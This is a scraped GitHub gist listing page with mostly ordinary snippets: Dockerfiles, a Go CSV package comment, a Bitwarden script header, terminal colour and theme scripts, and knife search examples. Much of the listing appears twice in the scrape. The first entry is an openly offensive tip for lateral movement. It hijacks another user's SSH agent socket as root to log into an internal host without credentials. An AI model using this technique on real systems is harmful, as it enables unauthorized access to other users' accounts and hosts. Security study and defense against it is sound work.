Eric Duncan eduncan911

## SSH Agent Forwarding.md

      
              1 file
            
          
              10 forks
            
          
              11 comments
            
          
              91 stars
            
          
                int0x80
                / SSH Agent Forwarding.md
            
            
              Created
              January 7, 2021 00:59
            
          
    Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

  
## Dockerfile
FROM plexinc/pms-docker:1.22.3.4523-d0ce30438

RUN apt-get update && \
  apt-get install -y software-properties-common && \
  add-apt-repository ppa:oibaf/graphics-drivers -y && \
  apt-get update && \
  apt-get install -y \
    vainfo \
    mesa-va-drivers \
    mesa-vdpau-drivers \

## csvdta.go
package csvdata
// csvdata complements the csv package by allowing you to map a custom structure to
// the columns of data in a CSV file. The struct needs to be annotated so that each
// field can match a column in the data
//
//    type Person struct {
//       FirstName string `field:"First Name"`
//       Second_Name string
//       Age int
//    }

## BW_Collections_Remover.py
# BitWarden tool to delete collections using bw CLI tool
# forked from: https://gist.github.com/eduncan911/c0f4d789b87c3746a055779a57ff57e5
# uses subprocess to run bw commands rather than sh which is Linux only

# You must install the bitwarden CLI tool (https://bitwarden.com/help/article/cli/#download-and-install)
# Create your session as per the instructions on the download page.
# You can replace your session key and use the following to process the results.

# place this script in the same dir as the bw executable

## simpler
#!/bin/sh
# Print four lines showing blocks of colors: 0-7 | 0-7bold | 8-15 | 8-15bold
perl -CADS -lwe '
my $block = shift || (chr(0x2588) x 3);
for (["", 0], ["1;", 0], ["", 8], ["1;", 8]) {
  my ($bold, $offset) = @$_;
  my @range = map $offset + $_, 0..7;
  printf "%s %-6s ", $bold ? "bold" : "norm", "$range[0]-$range[-1]";
  print map("\e[${bold}38;5;${_}m$block", @range), "\e[0m"
}

## knife cheat
# knife cheat

## Search Examples

	knife search "name:ip*"
	knife search "platform:ubuntu*"
	knife search "platform:*" -a macaddress
	knife search "platform:ubuntu*" -a uptime
	knife search "platform:ubuntu*" -a virtualization.system
	knife search "platform:ubuntu*" -a network.default_gateway

## solarize.sh
#!/bin/sh
#
# Shell script that configures gnome-terminal to use solarized theme
# colors. Written for Ubuntu 11.10, untested on anything else.
#
# Solarized theme: http://ethanschoonover.com/solarized
#
# Adapted from these sources:
# https://gist.github.com/1280177
# http://xorcode.com/guides/solarized-vim-eclipse-ubuntu/

## Dockerfile
FROM debian:squeeze

ENV DEBIAN_FRONTEND noninteractive

RUN apt-get update \
    && apt-get install -y wget \
    && wget -O - http://packages.vyos.net/vyos-pubkey.gpg  | apt-key add - \
    && echo "deb http://backports.debian.org/debian-backports squeeze-backports main" > /etc/apt/sources.list.d/bp.list \
    && apt-get update \
    && apt-get -t squeeze-backports install -y squashfs-tools \

## handler.js
var child_process = require('child_process');

exports.handler = function(event, context) {
  var proc = spawn('./test', [ JSON.stringify(event) ], { stdio: 'inherit' });

  proc.on('close', function(code){
    if(code !== 0) {
      return context.done(new Error("Process exited with non-zero status code"));
    }

## diff
# diff -u /usr/src/sys/amd64/conf/GENERIC.hints /boot/device.hints
--- /usr/src/sys/amd64/conf/GENERIC.hints       2016-09-29 08:24:54.000000000 +0900
+++ /boot/device.hints  2016-12-11 00:43:23.415251000 +0900
@@ -19,7 +19,6 @@
 hint.uart.0.port="0x3F8"
 hint.uart.0.flags="0x10"
 hint.uart.0.irq="4"
-hint.uart.1.at="isa"
 hint.uart.1.port="0x2F8"
 hint.uart.1.irq="3"
	FROM plexinc/pms-docker:1.22.3.4523-d0ce30438

	RUN apt-get update && \
	apt-get install -y software-properties-common && \
	add-apt-repository ppa:oibaf/graphics-drivers -y && \
	apt-get update && \
	apt-get install -y \
	vainfo \
	mesa-va-drivers \
	mesa-vdpau-drivers \
	package csvdata
	// csvdata complements the csv package by allowing you to map a custom structure to
	// the columns of data in a CSV file. The struct needs to be annotated so that each
	// field can match a column in the data
	//
	// type Person struct {
	// FirstName string `field:"First Name"`
	// Second_Name string
	// Age int
	// }
	# BitWarden tool to delete collections using bw CLI tool
	# forked from: https://gist.github.com/eduncan911/c0f4d789b87c3746a055779a57ff57e5
	# uses subprocess to run bw commands rather than sh which is Linux only

	# You must install the bitwarden CLI tool (https://bitwarden.com/help/article/cli/#download-and-install)
	# Create your session as per the instructions on the download page.
	# You can replace your session key and use the following to process the results.

	# place this script in the same dir as the bw executable
	#!/bin/sh
	# Print four lines showing blocks of colors: 0-7 \| 0-7bold \| 8-15 \| 8-15bold
	perl -CADS -lwe '
	my $block = shift \|\| (chr(0x2588) x 3);
	for (["", 0], ["1;", 0], ["", 8], ["1;", 8]) {
	my ($bold, $offset) = @$_;
	my @range = map $offset + $_, 0..7;
	printf "%s %-6s ", $bold ? "bold" : "norm", "$range[0]-$range[-1]";
	print map("\e[${bold}38;5;${_}m$block", @range), "\e[0m"
	}
	# knife cheat

	## Search Examples

	knife search "name:ip*"
	knife search "platform:ubuntu*"
	knife search "platform:*" -a macaddress
	knife search "platform:ubuntu*" -a uptime
	knife search "platform:ubuntu*" -a virtualization.system
	knife search "platform:ubuntu*" -a network.default_gateway
	#!/bin/sh
	#
	# Shell script that configures gnome-terminal to use solarized theme
	# colors. Written for Ubuntu 11.10, untested on anything else.
	#
	# Solarized theme: http://ethanschoonover.com/solarized
	#
	# Adapted from these sources:
	# https://gist.github.com/1280177
	# http://xorcode.com/guides/solarized-vim-eclipse-ubuntu/
	FROM debian:squeeze

	ENV DEBIAN_FRONTEND noninteractive

	RUN apt-get update \
	&& apt-get install -y wget \
	&& wget -O - http://packages.vyos.net/vyos-pubkey.gpg \| apt-key add - \
	&& echo "deb http://backports.debian.org/debian-backports squeeze-backports main" > /etc/apt/sources.list.d/bp.list \
	&& apt-get update \
	&& apt-get -t squeeze-backports install -y squashfs-tools \
	var child_process = require('child_process');

	exports.handler = function(event, context) {
	var proc = spawn('./test', [ JSON.stringify(event) ], { stdio: 'inherit' });

	proc.on('close', function(code){
	if(code !== 0) {
	return context.done(new Error("Process exited with non-zero status code"));
	}
	# diff -u /usr/src/sys/amd64/conf/GENERIC.hints /boot/device.hints
	--- /usr/src/sys/amd64/conf/GENERIC.hints 2016-09-29 08:24:54.000000000 +0900
	+++ /boot/device.hints 2016-12-11 00:43:23.415251000 +0900
	@@ -19,7 +19,6 @@
	hint.uart.0.port="0x3F8"
	hint.uart.0.flags="0x10"
	hint.uart.0.irq="4"
	-hint.uart.1.at="isa"
	hint.uart.1.port="0x2F8"
	hint.uart.1.irq="3"